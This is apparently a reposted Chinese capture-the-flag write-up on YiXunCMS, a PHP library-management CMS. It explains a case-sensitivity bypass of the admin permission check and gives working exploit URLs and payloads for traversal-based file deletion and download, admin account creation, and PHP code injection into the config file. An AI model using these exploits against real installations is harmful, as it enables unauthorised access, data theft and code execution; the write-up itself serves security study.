前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >巅峰极客YiXunCMS

巅峰极客YiXunCMS

作者头像
黑伞安全
发布2020-11-09 15:33:23
7190
发布2020-11-09 15:33:23
举报
文章被收录于专栏:黑伞安全黑伞安全黑伞安全

YiXunCMS

这次巅峰极客上出现的一道题目,当时思路大错误,并且网络上的都是关于后端的一个洞,没看到很么关于前台的洞。所以当时也就没有做出来。线下和师傅们交流了下,复现了一波。

过程梳理

首先这个CMS是一个基于YixunCMS二次开发的一个图书管理系统,下载地址。

https://pan.baidu.com/s/1i56qLQt#list/path=%2F

部署好之后,我们简单看一下整个框架的运行的一个过程。

这里我们可以看到,在入口文件index.phprequire('./php/index.php')我们接着跟进。跟进之后,我们不难发现。其主要作用就是一个自动包含,以及对url解析的,来触发相应的Controller中的Method。举个例子

比如我们访问

http://127.0.0.1/index.php/mrkaixin/hello/say/nice

那么这里就会解析成:

  • Controller: Mrkaixin
  • Method: hello
  • Param: say=nice

但是和一般的MVC框架不一样的是。

这里有两个静态方法

...
Structure::commoncontroler(APP_PATH."controls/",$controlerpath);
Structure::controler($srccontrolerfile, $controlerpath, $_GET["m"]); 
...

其实这俩方法的作用就是,在runtime文件夹下,根据Controller建立一个类,这个类都继承了Commons这个类(Common自身继承Action这个类。

那么再跟进到Commons.class.php中。

class Common extends Action {
   function init(){
      if(!file_exists("./runtime/install.lock")){
         header("Location:".B_ROOT."/install/index.php");
      }

      if(!(isset($_SESSION["isLogin"]) && $_SESSION["isLogin"]===1)){
         $this->redirect("login/index");
      }

      $setadmin=array('baseset');
      if(in_array($_GET["a"], $setadmin) && $_SESSION["setadmin"]!=1){
         $this->error("权限不足,你不能进行系统设置", 3, "index/main");
      }

      $useradmin=array('user', 'group');
      if(in_array($_GET["m"], $useradmin) && $_SESSION["useradmin"]!=1){
         $this->error("权限不足,你不能进行用户及用户组管理", 3, "index/main");
      }

      $memberadmin=array('readcolumn', 'member');
      if(in_array($_GET["m"], $memberadmin) && $_SESSION["memberadmin"]!=1){
         $this->error("权限不足,你不能进行读者管理", 3, "index/main");
      }        

      $bookadmin=array('bookcolumn', 'book');
      if(in_array($_GET["m"], $bookadmin) && $_SESSION["bookadmin"]!=1){
         $this->error("权限不足,你不能进行图书档案管理", 3, "index/main");
      }

      $borrowadmin=array('borrow');
      if(in_array($_GET["m"], $borrowadmin) && $_SESSION["borrwadmin"]!=1){
         $this->error("权限不足,你不能进行图书借阅操作", 3, "index/main");
      }

      $froadmin=array('fro');
      if(in_array($_GET["m"], $froadmin) && $_SESSION["froadmin"]!=1){
         $this->error("权限不足,你不能进行批量导入数据操作", 3, "index/main");
      }

      $dataadmin=array('databak','webbak');
      if(in_array($_GET["m"], $dataadmin) && $_SESSION["froadmin"]!=1){
         $this->error("权限不足,你不能进行数据管理操作", 3, "index/main");
      }        
      
   }

在这里我们可以发现,有大量的鉴权操作,如果进入到$this->error中的逻辑,会直接return一个值,然后跳转到login/index。那有可能会有人要问了,为什么上面已经跳转了,还能往下执行了呢,按理说不是应该,直接跳转了吗,为啥还要鉴权。

其实我们跟进到$this->redirect这个方法里面,就可以知道了。

这里我们可以看到,只是利用js进行跳转,所以要等到页面渲染的时候,才会进行一个跳转的操作,所以也自然而然不会暂停整个php代码往下运行。

但是如果进入到error这个方法,则会立即退出,然后渲染页面,导致跳转

所以漏洞点也就来了。那么如果我们绕过这些鉴权,也就意味着是不是所有的Controller都是未鉴权了呢?答案是肯定的。

我们看一下他鉴权的一个逻辑,不难发现,它是根据值在不在数组里来判断的,而没有采用,更安全的正则。

 $dataadmin=array('databak','webbak');
  if(in_array($_GET["m"], $dataadmin) && $_SESSION["froadmin"]!=1){
     $this->error("权限不足,你不能进行数据管理操作", 3, "index/main");
  }

所以这里我们只需要利用大小写,就可以顺利绕过。所以这样所有的后台洞,也就变成了前台的洞了。

前台任意文件删除+前台GetShell

有了未鉴权,这洞也太多了。

我们在home\controls一找一大堆,首先来一个任意文件删除,这类洞直接phpstorm ,搜索unlink

这里我们可以看到,直接吧我们的file参数,拼接到了dirname中,我们可以利用跨越目录的方式进行一个任意文件删除,这里我选择删除的是runtime/install.lock,这个文件是用来检查是否安装上的,删掉的话,又会重新运行安装程序,这样我们也是可以getshell

exp:

http://localhost/index.php/Webbak/del?file=../runtime/install.lock

这还没完,我们可以在网站名称这里进行任意代码执行。从而GetShell

");?><?php phpinfo(); ?>//

这里的原理是闭合掉config.inc.php中的内容

前台任意文件下载

这里还找了个任意文件下载的。还是home/contros/webbak

这里可以看到,也是可以拼接的路径,所以这里就不在具体分析。

exp:

http://localhost/index.php/Webbak/dow?file=../config.inc.php

任意添加管理员

home\controls\user.class.php下找到了个insert方法。

插入主要原理是通过对比user.xml$_POST的参数,并且POST参数是可控的,所以只需要设置gid1便可以任意创建管理员。

exp:

username=mrkaixin&userpwd=123&email=mrkaixin@vip.qq.com&userpwd=123&repwd=123&srcpwd=1&regtime=1&gid=1

前台Getshell姿势二

这个姿势和这篇文章里面讲的基本上一模一样,这里就不在赘述了。

exp:

appname=1&icp=1&copy=");?><?php phpinfo(); ?>//&bookPageSize=1&phwidth=1&phheight=1&bkwidth=1&bkheight=1

最近HW结束一直忙的停不下来。。。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-10-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑伞攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • YiXunCMS
  • 过程梳理
  • 前台任意文件删除+前台GetShell
  • 前台任意文件下载
  • 任意添加管理员
  • 前台Getshell姿势二
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档